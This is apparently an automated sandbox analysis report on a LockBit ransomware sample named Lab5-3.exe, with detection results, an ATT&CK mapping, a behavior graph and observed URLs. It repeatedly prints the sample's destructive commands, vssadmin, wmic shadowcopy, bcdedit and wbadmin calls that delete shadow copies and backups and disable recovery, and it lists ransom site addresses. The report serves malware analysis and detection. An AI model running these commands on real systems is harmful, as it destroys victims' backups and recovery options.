                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041A8E0 CreateThread,NtSetInformationThread,NtAllocateVirtualMemory,GetWindowsDirectoryW,RtlAcquirePebLock,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,RtlReleasePebLock,LdrEnumerateLoadedModules,19_2_0041A8E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416710 CreateToolhelp32Snapshot,CloseHandle,Process32First,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,19_2_00416710
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040F800 mov esi, dword ptr fs:[00000030h]19_2_0040F800
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416E10 mov eax, dword ptr fs:[00000030h]19_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416E10 mov esi, dword ptr fs:[00000030h]19_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040F630 mov esi, dword ptr fs:[00000030h]19_2_0040F630
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416CE0 mov esi, dword ptr fs:[00000030h]19_2_00416CE0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416B00 mov ecx, dword ptr fs:[00000030h]19_2_00416B00
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00419330 mov ebx, dword ptr fs:[00000030h]19_2_00419330
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040FDB0 mov eax, dword ptr fs:[00000030h]19_2_0040FDB0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040F800 mov esi, dword ptr fs:[00000030h]27_2_0040F800
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416E10 mov eax, dword ptr fs:[00000030h]27_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416E10 mov esi, dword ptr fs:[00000030h]27_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040F630 mov esi, dword ptr fs:[00000030h]27_2_0040F630
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416B00 mov ecx, dword ptr fs:[00000030h]27_2_00416B00
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00419330 mov ebx, dword ptr fs:[00000030h]27_2_00419330
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416CE0 mov esi, dword ptr fs:[00000030h]27_2_00416CE0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040FDB0 mov eax, dword ptr fs:[00000030h]27_2_0040FDB0
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wmic SHADOWCOPY /nointeractive
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416E10 EntryPoint,ExitProcess,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,Sleep,GetVersion,ExitProcess,ExitProcess,NtOpenProcess,GetSecurityInfo,RtlAllocateAndInitializeSid,RtlQueryInformationAcl,RtlLengthSid,malloc,RtlCreateAcl,RtlAddAccessDeniedAce,RtlGetAce,RtlGetAce,RtlAddAce,SetSecurityInfo,free,CreateThread,NtSetInformationThread,NtClose,RtlFreeSid,NtSetInformationProcess,RtlAdjustPrivilege,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,ExitProcess,GetTickCount,GetTickCount,GetTickCount,GetConsoleWindow,IsWindowVisible,NtWaitForSingleObject,ExitProcess,19_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00412A80 cpuid 19_2_00412A80
                      Source: C:\Windows\System32\vds.exeQueries volume information: \Device\CdRom0 VolumeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040F630 wvsprintfA,wsprintfA,wsprintfA,GetLocalTime,wsprintfA,RtlEnterCriticalSection,SetConsoleTextAttribute,SetConsoleTextAttribute,WriteFile,WriteFile,SetConsoleTextAttribute,WriteFile,GetConsoleWindow,IsWindowVisible,FlashWindow,RtlLeaveCriticalSection,19_2_0040F630
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416E10 EntryPoint,ExitProcess,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,Sleep,GetVersion,ExitProcess,ExitProcess,NtOpenProcess,GetSecurityInfo,RtlAllocateAndInitializeSid,RtlQueryInformationAcl,RtlLengthSid,malloc,RtlCreateAcl,RtlAddAccessDeniedAce,RtlGetAce,RtlGetAce,RtlAddAce,SetSecurityInfo,free,CreateThread,NtSetInformationThread,NtClose,RtlFreeSid,NtSetInformationProcess,RtlAdjustPrivilege,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,ExitProcess,GetTickCount,GetTickCount,GetTickCount,GetConsoleWindow,IsWindowVisible,NtWaitForSingleObject,ExitProcess,19_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts23
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Obfuscated Files or Information
                      OS Credential Dumping11
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium2
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      11
                      Process Injection
                      1
                      DLL Side-Loading
                      LSASS Memory4
                      File and Directory Discovery
                      Remote Desktop ProtocolData from Removable Media21
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Inhibit System Recovery
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      2
                      File Deletion
                      Security Account Manager26
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated Exfiltration1
                      Defacement
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder
                      112
                      Masquerading
                      NTDS1
                      Network Share Discovery
                      Distributed Component Object ModelInput Capture3
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                      Virtualization/Sandbox Evasion
                      LSA Secrets1
                      Query Registry
                      SSHKeylogging1
                      Proxy
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Process Injection
                      Cached Domain Credentials121
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1432380 Sample: Lab5-3.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 98 Found malware configuration 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 Antivirus detection for URL or domain 2->102 104 14 other signatures 2->104 8 Lab5-3.exe 7 1008 2->8         started        13 Lab5-3.exe 2->13         started        15 Lab5-3.exe 2->15         started        17 6 other processes 2->17 process3 dnsIp4 90 192.168.2.100 unknown unknown 8->90 92 192.168.2.101 unknown unknown 8->92 96 97 other IPs or domains 8->96 68 C:\...\CourierStd-BoldOblique.otf.lockbit, DOS 8->68 dropped 70 C:\Program Files\...\selector.js.lockbit, DOS 8->70 dropped 72 C:\Program Files\...\ui-strings.js.lockbit, DOS 8->72 dropped 80 277 other files (270 malicious) 8->80 dropped 116 Connects to many different private IPs via SMB (likely to spread or exploit) 8->116 118 Connects to many different private IPs (likely to spread or exploit) 8->118 120 Found evasive API chain (may stop execution after checking mutex) 8->120 136 5 other signatures 8->136 19 cmd.exe 8->19         started        22 conhost.exe 8->22         started        74 C:\Program Files\Adobe\...\eBook.api.lockbit, data 13->74 dropped 76 C:\Program Files\...\Updater.api.lockbit, data 13->76 dropped 78 C:\Program Files\...\WindowsMedia.mpp.lockbit, data 13->78 dropped 82 196 other files (192 malicious) 13->82 dropped 122 May disable shadow drive data (uses vssadmin) 13->122 124 Found Tor onion address 13->124 126 Deletes shadow drive data (may be related to ransomware) 13->126 24 cmd.exe 13->24         started        26 cmd.exe 13->26         started        32 5 other processes 13->32 84 49 other files (42 malicious) 15->84 dropped 128 Spreads via windows shares (copies files to share folders) 15->128 130 Uses bcdedit to modify the Windows boot settings 15->130 28 cmd.exe 15->28         started        30 cmd.exe 15->30         started        34 6 other processes 15->34 94 239.255.255.250 unknown Reserved 17->94 132 Creates files inside the volume driver (system volume information) 17->132 134 Hides threads from debuggers 17->134 36 3 other processes 17->36 file5 signatures6 process7 dnsIp8 106 Deletes the backup plan of Windows 19->106 39 vssadmin.exe 19->39         started        44 5 other processes 19->44 46 6 other processes 24->46 48 2 other processes 26->48 108 May disable shadow drive data (uses vssadmin) 28->108 110 Deletes shadow drive data (may be related to ransomware) 28->110 112 Uses bcdedit to modify the Windows boot settings 28->112 42 vssadmin.exe 28->42         started        50 5 other processes 28->50 52 2 other processes 30->52 54 5 other processes 32->54 56 9 other processes 34->56 86 www.google.com 36->86 88 google.com 36->88 signatures9 process10 signatures11 114 Deletes shadow drive data (may be related to ransomware) 42->114 58 Conhost.exe 42->58         started        60 Conhost.exe 54->60         started        62 Conhost.exe 54->62         started        64 Conhost.exe 56->64         started        66 Conhost.exe 56->66         started        process12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Lab5-3.exe96%ReversingLabsWin32.Ransomware.LockBit
                      Lab5-3.exe100%AviraTR/Crypt.XPACK.DT
                      Lab5-3.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://chromeenterprise.google/policies/#BrowserSwitcherEnabled0%URL Reputationsafe
                      http://www.bohemiancoding.com/sketch0%URL Reputationsafe
                      https://passwords.google.comGoogle0%URL Reputationsafe
                      https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl0%URL Reputationsafe
                      https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl0%URL Reputationsafe
                      https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist0%URL Reputationsafe
                      https://chromeenterprise.google/policies/#BrowserSwitcherUrlList0%URL Reputationsafe
                      https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist0%URL Reputationsafe
                      http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50100%Avira URL Cloudmalware
                      http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50100%Avira URL Cloudmalware
                      http://lockbitks2tvnmwk.onion/?100%Avira URL Cloudmalware
                      http://lockbit-decryptor.top/?100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      google.com
                      172.217.165.206
                      truefalse
                        high
                        www.google.com
                        142.250.217.228
                        truefalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://chromeenterprise.google/policies/#BrowserSwitcherEnabledLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://assets.activity.windows.com/v1/assetsLab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://chrome.google.com/webstore/category/extensionsLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://word.office.comLab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://support.google.com/chromebook?p=app_intentLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://jquery.org/licenseLab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.bohemiancoding.com/sketchLab5-3.exe, 00000028.00000003.2636402904.000000001E109000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E0C9000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E1C9000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E189000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2591083584.000000001E109000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E089000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E149000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.wctF86A.tmp.lockbit.0.drfalse
                                      high
                                      http://jqueryui.comLab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?uLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://passwords.google.comGoogleLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://powerpoint.office.comLab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.torproject.org/Lab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drfalse
                                              high
                                              https://excel.office.comLab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://dc.services.visualstudio.com/v2/trackwctF86A.tmp.lockbit.0.drfalse
                                                  high
                                                  https://outlook.comLab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.cowctF86A.tmp.lockbit.0.drfalse
                                                      high
                                                      https://www.google.com/intl/br/chrome/browser/Lab5-3.exe, 0000001B.00000003.2736606134.0000000007C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://photos.google.com/settings?referrer=CHROME_NTPLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://myactivity.google.com/Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
